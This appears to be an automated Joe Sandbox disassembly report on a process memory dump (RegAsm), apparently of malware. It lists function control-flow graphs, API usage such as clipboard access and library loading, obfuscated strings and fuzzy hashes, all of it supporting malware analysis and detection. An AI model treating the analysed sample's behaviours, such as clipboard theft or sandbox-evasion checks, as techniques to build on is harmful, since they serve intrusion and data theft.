                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (Y6[$.AtC$89$9]_$9lji$D!M#$Gq\s$Gu@w$PQ$S%U'$XyR{$Ym]o$hI2K$k=W?$pE}G$w%r'$yQrS$zMzO$us$f
                                                                      • API String ID: 0-1367088923
                                                                      • Opcode ID: bd0f71112ca25ec8b8a9f2482f83a574c3380875e503502dc80236c562b04332
                                                                      • Instruction ID: a09763c792eff68ee2d066390d92369163d89c9f7aba8ef65be1ebf7ec03b0a0
                                                                      • Opcode Fuzzy Hash: bd0f71112ca25ec8b8a9f2482f83a574c3380875e503502dc80236c562b04332
                                                                      • Instruction Fuzzy Hash: A30266B4108380EFD3609F65E880B5BBBE4FB86745F40492DF5C99B262D774D884CB5A
                                                                      Function 0040FEBC Relevance: 13.2, Strings: 10, Instructions: 710COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 40febc-40fec1 75 40fed0 74->75 76 410121-4101d3 call 40ca20 74->76 77 40fed2-40fed4 74->77 78 40fec8-40fecf 74->78 79 40fed9-4100ca 74->79 80 410118-41011c 74->80 75->77 83 410426-410432 76->83 91 410340 76->91 92 410349-41034f 76->92 93 4103c8-4103f5 76->93 94 41044e 76->94 95 410211-410218 76->95 96 410350-410358 76->96 97 410455-41045c 76->97 98 4101da 76->98 99 41021a-410234 76->99 100 4101e0 76->100 101 410360-410365 76->101 102 410420 76->102 103 410323-410339 76->103 104 4102e7-4102ee 76->104 105 4103a6-4103c1 call 446fa0 76->105 106 41036c-41036f 76->106 107 4101f0 76->107 108 410376-410380 76->108 109 4101f9-41020a 76->109 110 4102fb-41031c 76->110 111 41043d-41044c 76->111 112 4103fc-41040b 76->112 85 410435-41043c 77->85 78->75 81 4100fc-410104 79->81 82 4100cc-4100cf 79->82 80->83 89 410107-410111 81->89 86 4100d0-4100fa call 412110 82->86 83->85 86->81 89->76 89->80 89->83 89->91 89->92 89->93 89->94 89->95 89->96 89->97 89->98 89->99 89->100 89->101 89->102 89->103 89->104 89->105 89->106 89->107 89->108 89->109 89->110 89->111 89->112 91->92 92->96 93->83 93->94 93->97 93->102 93->106 93->108 93->111 93->112 114 41073a-410743 93->114 130 410760-410790 93->130 94->97 115 41026f-410296 95->115 96->101 97->114 116 410236 99->116 117 41026a-41026c 99->117 100->107 101->83 101->94 101->97 101->102 101->106 101->108 101->111 101->112 101->114 103->83 103->91 103->92 103->93 103->94 103->96 103->97 103->101 103->102 103->105 103->106 103->108 103->111 103->112 104->110 105->83 105->93 105->94 105->97 105->101 105->102 105->106 105->108 105->111 105->112 105->114 105->130 106->83 106->94 106->97 106->102 106->108 106->111 106->114 107->109 119 410388-41039f 108->119 109->83 109->91 109->92 109->93 109->94 109->95 109->96 109->97 109->99 109->101 109->102 109->103 109->104 109->105 109->106 109->108 109->110 109->111 109->112 110->83 110->91 110->92 110->93 110->94 110->96 110->97 110->101 110->102 110->103 110->105 110->106 110->108 110->111 110->112 111->83 112->102 114->130 123 410298 115->123 124 4102ca-4102e0 115->124 120 410240-410268 call 412210 116->120 117->115 119->83 119->93 119->94 119->97 119->101 119->102 119->105 119->106 119->108 119->111 119->112 119->114 119->130 120->117 132 4102a0-4102c8 call 412190 123->132 124->83 124->91 124->92 124->93 124->94 124->96 124->97 124->101 124->102 124->103 124->104 124->105 124->106 124->108 124->110 124->111 124->112 133 410792 130->133 134 4107cb-4107e6 130->134 132->124 138 4107a0-4107c9 call 411c20 133->138 143 410ac0-410ad1 134->143 144 410b20 134->144 145 410b40 134->145 146 410aa3 134->146 147 4108c5-4108c9 134->147 148 410b25-410b2c 134->148 149 410a04-410a18 134->149 150 410a86-410a9c call 446fa0 134->150 151 410b86-410b8d 134->151 152 410b4b 134->152 153 410a4a-410a65 134->153 154 4107ed-4107f1 134->154 155 410a2f-410a43 134->155 156 4108ce-4108ea 134->156 157 4108f1-410958 134->157 158 410ab0-410ab8 134->158 159 410b10 134->159 160 410b33 134->160 161 410b12 134->161 162 4107f6-410818 134->162 163 410af6-410b07 134->163 164 410b19 134->164 165 410b39-410b3f 134->165 166 410ad8-410af0 134->166 138->134 143->166 144->148 145->152 146->158 175 410b52 147->175 148->145 148->152 148->160 148->165 180 410a1f-410a28 149->180 150->143 150->144 150->145 150->146 150->148 150->151 150->152 150->158 150->159 150->160 150->161 150->163 150->164 150->165 150->166 173 410b94 151->173 174 410b96-410ba5 151->174 152->175 183 410a6c-410a7f 153->183 170 410b5c-410b63 154->170 155->143 155->144 155->145 155->146 155->148 155->150 155->151 155->152 155->153 155->158 155->159 155->160 155->161 155->163 155->164 155->165 155->166 156->143 156->144 156->145 156->146 156->148 156->149 156->150 156->151 156->152 156->153 156->155 156->157 156->158 156->159 156->160 156->161 156->163 156->164 156->165 156->166 167 41098b-410993 157->167 168 41095a 157->168 158->159 161->164 171 41084b-41087b 162->171 172 41081a 162->172 163->159 164->144 165->145 166->163 178 4109b1-4109c0 167->178 179 410995-41099f 167->179 176 410960-410989 call 411da0 168->176 191 410b6d-410b7b 170->191 184 4108a6-4108af 171->184 185 41087d-41087f 171->185 181 410820-410849 call 411d20 172->181 173->174 175->170 176->167 189 4109c2-4109c4 178->189 190 4109e5-4109fd 178->190 188 4109a0-4109af 179->188 180->143 180->144 180->145 180->146 180->148 180->150 180->151 180->152 180->153 180->155 180->158 180->159 180->160 180->161 180->163 180->164 180->165 180->166 181->171 183->143 183->144 183->145 183->146 183->148 183->150 183->151 183->152 183->158 183->159 183->160 183->161 183->163 183->164 183->165 183->166 198 4108b5-4108be 184->198 193 410880-4108a4 call 411ca0 185->193 188->178 188->188 195 4109d0-4109e1 189->195 190->149 191->143 191->144 191->145 191->146 191->147 191->148 191->149 191->150 191->151 191->152 191->153 191->154 191->155 191->156 191->157 191->158 191->159 191->160 191->161 191->162 191->163 191->164 191->165 191->166 193->184 195->195 199 4109e3 195->199 198->143 198->144 198->145 198->146 198->147 198->148 198->149 198->150 198->151 198->152 198->153 198->155 198->156 198->157 198->158 198->159 198->160 198->161 198->163 198->164 198->165 198->166 199->190
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 13$58$89$8<$9lji$I1$PQ$w%r'$us$f
                                                                      • API String ID: 0-2782953580
                                                                      • Opcode ID: 9b76d46fa66223bdcbb40c86f8213a292735e728758ff7986478ce89d37e3186
                                                                      • Instruction ID: d3e6123da5a87937c4ce527ea16b001d947dd1f89a44154d0df95b1e97982e4a
                                                                      • Opcode Fuzzy Hash: 9b76d46fa66223bdcbb40c86f8213a292735e728758ff7986478ce89d37e3186
                                                                      • Instruction Fuzzy Hash: CB4289B4104740DFD324CF25E884B1ABBB5FF8A305F54896DE48A8B2A2D735E846CF55
                                                                      Function 0040D2C0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 202 40d2c0-40d2cb call 445d80 205 40d2d1-40d2e0 GetInputState call 43cfb0 202->205 206 40d4ae-40d4b0 ExitProcess 202->206 209 40d2e6-40d30f GetCurrentThreadId GetCurrentProcessId 205->209 210 40d4a9 call 446f80 205->210 211 40d311 209->211 212 40d346-40d368 209->212 210->206 216 40d320-40d344 call 40d4c0 211->216 214 40d396-40d398 212->214 215 40d36a 212->215 218 40d446-40d46a 214->218 219 40d39e-40d3bb 214->219 217 40d370-40d394 call 40d530 215->217 216->212 217->214 221 40d496 call 40ed90 218->221 222 40d46c-40d46f 218->222 224 40d3e6-40d40f 219->224 225 40d3bd-40d3bf 219->225 233 40d49b-40d49d 221->233 227 40d470-40d494 call 40d6c0 222->227 224->218 231 40d411 224->231 230 40d3c0-40d3e4 call 40d5c0 225->230 227->221 230->224 235 40d420-40d444 call 40d640 231->235 233->210 237 40d49f-40d4a4 call 412290 call 410470 233->237 235->218 237->210
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess$ExitInputStateThread
                                                                      • String ID: 'GFA$edgf
                                                                      • API String ID: 1029096631-957644222
                                                                      • Opcode ID: 502ce430d97d9e37560fd800a07c2546b427697bcdc0870340be3cc5bdd76706
                                                                      • Instruction ID: 7ad23a135721fdd6d89255751fe31a0f6133d9381a8379ca88b8a81bac4427f5
                                                                      • Opcode Fuzzy Hash: 502ce430d97d9e37560fd800a07c2546b427697bcdc0870340be3cc5bdd76706
                                                                      • Instruction Fuzzy Hash: 7C414C7480D2809BC301BF99D544A1EFBE5AF52709F148D2DE5C4A73A2C73AD858CB6B
                                                                      Function 00447600 Relevance: 6.9, Strings: 5, Instructions: 614COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 244 447600-44762a call 447f10 247 447644-447661 244->247 248 447716-44772f 244->248 249 4477f6-447836 244->249 250 447710 244->250 251 447730 244->251 252 447750-44778f 244->252 253 447631-44763d 244->253 254 4479c2-4479c4 244->254 255 447732-447749 call 44a5f0 244->255 256 4476ac-4476c2 244->256 257 4479c9-4479f8 244->257 258 4479ab-4479ad 244->258 269 447694-4476a5 247->269 270 447663 247->270 248->251 265 447838 249->265 266 44786a-447873 249->266 250->248 251->255 272 447791 252->272 273 4477ca-4477d3 252->273 253->247 253->248 253->249 253->250 253->251 253->252 253->255 253->256 253->257 253->258 264 447d05-447d0c 254->264 255->249 255->252 255->257 255->258 282 447a8b-447a8d 255->282 297 447a92-447ab4 call 447f10 255->297 300 447b2f-447b3b 255->300 302 447abb-447adb 255->302 259 4476f4-447700 256->259 260 4476c4 256->260 267 447a26-447a31 257->267 268 4479fa 257->268 258->254 261 4479b4-4479b9 258->261 262 4479c0 258->262 263 447b4f 258->263 259->255 283 4476d0-4476f2 call 448720 260->283 261->262 288 447b58 263->288 276 447840-447868 call 4487a0 265->276 274 447891-4478a6 call 445ab0 266->274 279 447875-44787b 266->279 280 447a33-447a3b 267->280 281 447a7c-447a84 267->281 277 447a00-447a24 call 448890 268->277 269->249 269->252 269->255 269->256 269->257 269->258 269->282 278 447670-447692 call 4486a0 270->278 285 4477a0-4477c8 call 448820 272->285 273->274 275 4477d9-4477df 273->275 324 4478c1-447925 274->324 325 4478a8-4478ab 274->325 287 4477e0-4477ef 275->287 276->266 277->267 278->269 292 447880-44788f 279->292 293 447a40-447a47 280->293 281->282 296 447b40 281->296 281->297 298 447b42-447b4a 281->298 299 447d0d-447d2d 281->299 281->300 301 447b1f-447b25 281->301 281->302 303 447d9c-447dbc 282->303 283->259 285->273 287->287 305 4477f1 287->305 288->264 292->274 292->292 311 447a50-447a56 293->311 312 447a49-447a4c 293->312 297->296 297->298 297->299 297->300 297->301 297->302 333 447e38-447e45 297->333 334 447e7a-447e87 297->334 298->299 308 447d56-447d5d 299->308 309 447d2f 299->309 300->296 301->300 318 447b04-447b18 302->318 319 447add-447adf 302->319 316 447de6-447df0 303->316 317 447dbe-447dbf 303->317 305->274 308->303 321 447d5f-447d6a 308->321 320 447d30-447d54 call 448890 309->320 311->281 323 447a58-447a74 call 447560 311->323 312->293 322 447a4e 312->322 329 447df2-447dff 316->329 330 447e18 316->330 327 447dc0-447de4 call 448890 317->327 318->254 318->261 318->262 318->263 318->288 318->299 318->301 331 447eb6-447ebb 318->331 332 447ed0 318->332 318->333 318->334 328 447ae0-447b02 call 448900 319->328 320->308 340 447d70-447d77 321->340 322->281 354 447a79 323->354 343 447956-447961 324->343 344 447927 324->344 342 4478b0-4478bf 325->342 327->316 328->318 347 447e00-447e07 329->347 330->282 330->288 330->296 330->297 330->298 330->299 330->300 330->301 330->302 330->331 330->332 330->333 330->334 335 447e1f-447e29 call 447560 330->335 331->332 336 447e74 333->336 337 447e47 333->337 334->333 339 447e89 334->339 363 447e2e-447e31 335->363 336->334 349 447e50-447e72 call 448980 337->349 351 447e90-447eb2 call 448980 339->351 352 447d80-447d86 340->352 353 447d79-447d7c 340->353 342->324 342->342 356 447963-44796b 343->356 357 44799f-4479a4 343->357 355 447930-447954 call 448890 344->355 360 447e10-447e16 347->360 361 447e09-447e0c 347->361 349->336 376 447eb4 351->376 352->303 367 447d88-447d94 call 447560 352->367 353->340 366 447d7e 353->366 354->281 355->343 369 447970-447977 356->369 357->257 357->258 357->282 357->296 357->297 357->298 357->299 357->300 357->301 357->302 360->330 360->335 361->347 362 447e0e 361->362 362->330 363->282 363->288 363->296 363->297 363->298 363->299 363->300 363->301 363->302 363->331 363->332 363->333 363->334 366->303 377 447d99 367->377 374 447980-447986 369->374 375 447979-44797c 369->375 374->357 379 447988-447997 call 447560 374->379 375->369 378 44797e 375->378 376->333 377->303 378->357 381 44799c 379->381 381->357
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %sgh$2wD$4`[b$B{D$EBC
                                                                      • API String ID: 0-496620645
                                                                      • Opcode ID: 865e8d7a960f62aafbc96611e0bb75791c5df7bc6a7c9e46bf01ca827213b2f7
                                                                      • Instruction ID: 69e25fd42919f09a0fad1ce1aae30dbab7648f036e3687e99ce2e3a807c76338
                                                                      • Opcode Fuzzy Hash: 865e8d7a960f62aafbc96611e0bb75791c5df7bc6a7c9e46bf01ca827213b2f7
                                                                      • Instruction Fuzzy Hash: 782290B4D04206DFEB10DF94D8516BFBBB1FF0A315F140869E941AB352D3399852CBA8
                                                                      Function 0040EFFC Relevance: 6.8, Strings: 5, Instructions: 550COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 382 40effc 383 40effd-40f00c call 40f7e0 382->383 385 40f020 383->385 386 40f240-40f24f call 40fd50 383->386 387 40f220-40f237 call 40fd50 383->387 388 40f0c3-40f1d8 383->388 389 40f267 383->389 390 40f26c 383->390 391 40f030-40f03d 383->391 392 40f070-40f072 383->392 393 40f090 383->393 394 40f271-40f2da 383->394 395 40f076-40f07a 383->395 396 40f0b6-40f0bc 383->396 397 40f096-40f0a1 383->397 398 40f25d-40f260 383->398 385->391 434 40f254 386->434 387->386 427 40f21a 388->427 428 40f1da 388->428 389->390 390->394 420 40f061-40f06f 391->420 421 40f03f-40f043 391->421 392->395 393->397 418 40f31a-40f325 394->418 419 40f2dc-40f2df 394->419 395->386 395->387 395->388 395->389 395->390 395->393 395->394 395->396 395->397 395->398 396->386 396->387 396->388 396->389 396->390 396->394 396->398 397->396 422 40f0b0 397->422 423 40eeb0-40eecb call 440580 397->423 424 40ef70-40ef76 397->424 425 40eed4-40eedb 397->425 426 40eff8 397->426 398->389 398->394 401 40f440 398->401 402 40f540 398->402 403 40f5c0-40f5c7 398->403 404 40f520-40f528 398->404 405 40f442-40f447 398->405 406 40f542-40f54f 398->406 407 40f364-40f390 398->407 408 40f62e-40f64d call 444270 398->408 409 40f52f-40f53b 398->409 410 40f5af 398->410 411 40f430-40f438 398->411 412 40f570 398->412 413 40f5f2 398->413 414 40f572-40f5a7 398->414 415 40f493-40f4a2 398->415 416 40f5f4-40f601 398->416 417 40f556-40f55a 398->417 448 40f5d0-40f5d3 403->448 404->402 404->403 404->404 404->406 404->409 404->410 404->412 404->413 404->414 404->415 404->416 404->417 429 40f450-40f45a 405->429 406->403 406->404 406->410 406->412 406->414 406->417 443 40f392 407->443 444 40f3da-40f3e3 407->444 409->402 410->403 411->401 413->416 414->410 431 40f4b0-40f4b7 415->431 435 40f621-40f62a 416->435 436 40f603-40f607 416->436 417->412 440 40f350-40f352 418->440 441 40f327-40f32b 418->441 437 40f2e0-40f318 call 411720 419->437 420->392 430 40f050-40f05f 421->430 422->396 423->425 424->424 445 40ef78-40ef93 424->445 442 40eee0-40eee6 425->442 426->382 427->387 432 40f1e0-40f218 call 4116a0 428->432 429->429 449 40f45c-40f48c 429->449 430->420 430->430 431->431 453 40f4b9-40f4cf 431->453 432->427 434->398 435->408 450 40f610-40f61f 436->450 437->418 457 40f356-40f35d 440->457 455 40f337-40f33b 441->455 442->442 456 40eee8-40eefc 442->456 459 40f3a0-40f3d8 call 4117a0 443->459 446 40f422-40f429 444->446 447 40f3e5-40f3ef 444->447 461 40efa0-40efc5 call 411420 445->461 446->401 446->402 446->403 446->404 446->405 446->406 446->408 446->409 446->410 446->411 446->412 446->413 446->414 446->415 446->416 446->417 462 40f407-40f40b 447->462 466 40f5d6 448->466 449->402 449->403 449->404 449->406 449->409 449->410 449->412 449->413 449->414 449->415 449->416 449->417 450->435 450->450 463 40f4d5-40f4d9 453->463 464 40f5da-40f5eb call 40f7e0 453->464 469 40f354 455->469 470 40f33d-40f344 455->470 471 40ef4d-40ef52 456->471 472 40eefe-40ef07 456->472 457->401 457->402 457->403 457->404 457->405 457->406 457->407 457->408 457->409 457->410 457->411 457->412 457->413 457->414 457->415 457->416 457->417 459->444 496 40efc7-40efcd 461->496 497 40efcf-40efda 461->497 475 40f420 462->475 476 40f40d-40f414 462->476 478 40f4e0-40f4e4 463->478 464->402 464->403 464->404 464->406 464->410 464->412 464->413 464->414 464->416 464->417 466->464 469->457 479 40f346-40f348 470->479 480 40f34a 470->480 471->424 481 40ef10-40ef35 call 411420 472->481 475->446 484 40f416-40f418 476->484 485 40f41a 476->485 478->448 486 40f4ea-40f504 call 411420 478->486 479->480 488 40f330-40f335 480->488 489 40f34c-40f34e 480->489 502 40ef37-40ef3d 481->502 503 40ef3f-40ef45 481->503 484->485 492 40f400-40f405 485->492 493 40f41c-40f41e 485->493 500 40f506-40f50c 486->500 501 40f50e-40f514 486->501 488->455 488->457 489->488 492->446 492->462 493->492 496->461 496->497 497->426 500->478 500->501 501->466 502->481 502->503 503->471
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %!-0$:g;1$GA$j$yE
                                                                      • API String ID: 0-657862259
                                                                      • Opcode ID: 8daadd4c4eafb44f063823af2852c0169c47290188a28889f776968e4671cce3
                                                                      • Instruction ID: 0bf61b085e90676ab9422539f66e4567ca3ca80a6a34bc9c966370a20edcd352
                                                                      • Opcode Fuzzy Hash: 8daadd4c4eafb44f063823af2852c0169c47290188a28889f776968e4671cce3
                                                                      • Instruction Fuzzy Hash: BD02CE74108381CFD321DF14D4806ABB7E1BF9A309F044A3DE8C99B392E3799959CB5A
                                                                      Function 00447560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 504 447560-447592 LdrInitializeThunk
                                                                      APIs
                                                                      • LdrInitializeThunk.NTDLL(00444FF1,00000001,00000005,?,00000000,?,?,004214D5), ref: 0044758E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: 7654$7654
                                                                      • API String ID: 2994545307-1888865020
                                                                      • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                      • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                      • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                      • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                      Function 0044A7E0 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 505 44a7e0-44a7eb 506 44a7f0-44a7f9 505->506 506->506 507 44a7fb-44a80f 506->507 508 44a811-44a816 507->508 509 44a818 507->509 510 44a81f-44a847 call 40cac0 508->510 509->510 513 44a862-44a8e1 510->513 514 44a849-44a84f 510->514 515 44a916-44a921 513->515 516 44a8e3 513->516 517 44a850-44a860 514->517 519 44a975-44a987 call 40cad0 515->519 520 44a923-44a92b 515->520 518 44a8f0-44a914 call 44c200 516->518 517->513 517->517 518->515 522 44a930-44a937 520->522 526 44a940-44a946 522->526 527 44a939-44a93c 522->527 526->519 529 44a948-44a96b call 447560 526->529 527->522 528 44a93e 527->528 528->519 531 44a970-44a973 529->531 531->519
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: @$MNOP
                                                                      • API String ID: 2994545307-2234187807
                                                                      • Opcode ID: 383395a8c2557685db5440b8f2875ef8fac23426ad172215021297f230a7d1c8
                                                                      • Instruction ID: 80857ea081e9c0ef4e0b68a0f371812cde995d369360003f316b1ac55e0fae6d
                                                                      • Opcode Fuzzy Hash: 383395a8c2557685db5440b8f2875ef8fac23426ad172215021297f230a7d1c8
                                                                      • Instruction Fuzzy Hash: E441DEB15083009FE710DF58D885A2BBBE5FF85318F09892EE485CB2A2E379C914CB57
                                                                      Function 0040ED90 Relevance: 1.6, APIs: 1, Instructions: 87libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 532 40ed90-40edc2 533 40ee01-40ee45 532->533 534 40edc4 532->534 536 40ee76-40ee86 LoadLibraryExW call 445a90 533->536 537 40ee47 533->537 535 40edd0-40edff call 411620 534->535 535->533 542 40ee8b-40ee8e 536->542 538 40ee50-40ee74 call 4115a0 537->538 538->536 545 40ee95-40ee97 542->545 546 40ee9c 542->546 547 40f643-40f64d 545->547 546->547
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(E31BE117,00000000,191A131C), ref: 0040EE7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: b255b2b3df52fa8fefe507985d2cf18ad8c452aef6b15d87a3589c64d6e5f074
                                                                      • Instruction ID: 63d71ec5668dfa77f13543280154113270aaac174107f28ab34eb916c867471b
                                                                      • Opcode Fuzzy Hash: b255b2b3df52fa8fefe507985d2cf18ad8c452aef6b15d87a3589c64d6e5f074
                                                                      • Instruction Fuzzy Hash: 6C215A7410C3849BD311AF15D844A5FBBE5FB9A709F440E2EF1C8A7292C339D9148B6B
                                                                      Function 00444282 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 548 444282-444289 549 444290-4442ad 548->549 550 4442f0 548->550 551 444300 548->551 552 4442f2-4442fa 548->552 553 444302-444306 RtlFreeHeap 548->553 554 444308-44430c 548->554 555 4442d6-4442e3 549->555 556 4442af 549->556 550->552 551->553 552->551 553->554 555->550 557 4442b0-4442d4 call 447470 556->557 557->555
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(?,00000000), ref: 00444306
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 9b64c73a6e1149bfdb640a00ee75ce205078f54ff32e19d42aa46313119ccf0f
                                                                      • Instruction ID: 6bffe2fc0ddf8828133d19de1647fbd8cb8d601340a533239dc1377920776a1d
                                                                      • Opcode Fuzzy Hash: 9b64c73a6e1149bfdb640a00ee75ce205078f54ff32e19d42aa46313119ccf0f
                                                                      • Instruction Fuzzy Hash: 52012874608740AFD301EB59E8A0A2ABBE5AB8A701F14481CE4C487362C339DC50CB9A

                                                                      Non-executed Functions

                                                                      Function 0041E52C Relevance: 38.6, Strings: 30, Instructions: 1100COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $+*)$(/.-$-"# $076|$1674$4;:p$7654$<jkh$@GFE$AFGD$DKJI$HFo$L321$PWVU$S=S?$T[ZY$UJKH$Ug0a$X_^]$Xa!m$\CBA$`gfe$eZ[X$honm$i'&%$lSRQ$pwvu$qvw=$t{zy$|cba
                                                                      • API String ID: 0-1574315579
                                                                      • Opcode ID: f29a7beffedca84d5b0e643aad4964e4bff0c2dc32eddaca6496bb59bb61511b
                                                                      • Instruction ID: 4a74ac0f85910918f006d736c5d0f92f2dd812b80d548ca96f91c83005aa597a
                                                                      • Opcode Fuzzy Hash: f29a7beffedca84d5b0e643aad4964e4bff0c2dc32eddaca6496bb59bb61511b
                                                                      • Instruction Fuzzy Hash: 41A27AB4200B409FE720DF25C881BE7B7E2EF45304F54492EE9AA5B291DB39B486CF55
                                                                      Function 004327B0 Relevance: 19.2, APIs: 2, Strings: 8, Instructions: 1749COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: drC$#JC$.L6j$>Wv$KJIg$vRTb$~PF<$#v
                                                                      • API String ID: 0-3335837278
                                                                      • Opcode ID: b49086e5311dadaa935c078b0d22b8ac093333b5ead3b543180416bfd8a0cf4b
                                                                      • Instruction ID: 80dd1b3f92e3bf53a7d47459d3dbaa13194b9cb319ea6a1a27847e4a333d22a3
                                                                      • Opcode Fuzzy Hash: b49086e5311dadaa935c078b0d22b8ac093333b5ead3b543180416bfd8a0cf4b
                                                                      • Instruction Fuzzy Hash: 9BD27270405B808BE7318F35C490BA3BBE1AF1B306F58599ED4EB8B382D779A505CB65
                                                                      Function 00439000 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100clipboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                      • String ID: 3$?$e
                                                                      • API String ID: 2832541153-3975470078
                                                                      • Opcode ID: 9da8b1234222b0aafb8b3fc8940d2f88cb45ae5217a432052fd4da87163de2ca
                                                                      • Instruction ID: a9f521efd2a2c46b063ecbce395cbb1927191a562d08ac0c9302c0b51827cb25
                                                                      • Opcode Fuzzy Hash: 9da8b1234222b0aafb8b3fc8940d2f88cb45ae5217a432052fd4da87163de2ca
                                                                      • Instruction Fuzzy Hash: 0441A37540C3818ED311EF3CD48832FBFE09B96314F154A2EE4D996392C678894ACB67
                                                                      Function 0044004B Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 420COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: String$Free$Variant$ClearInit
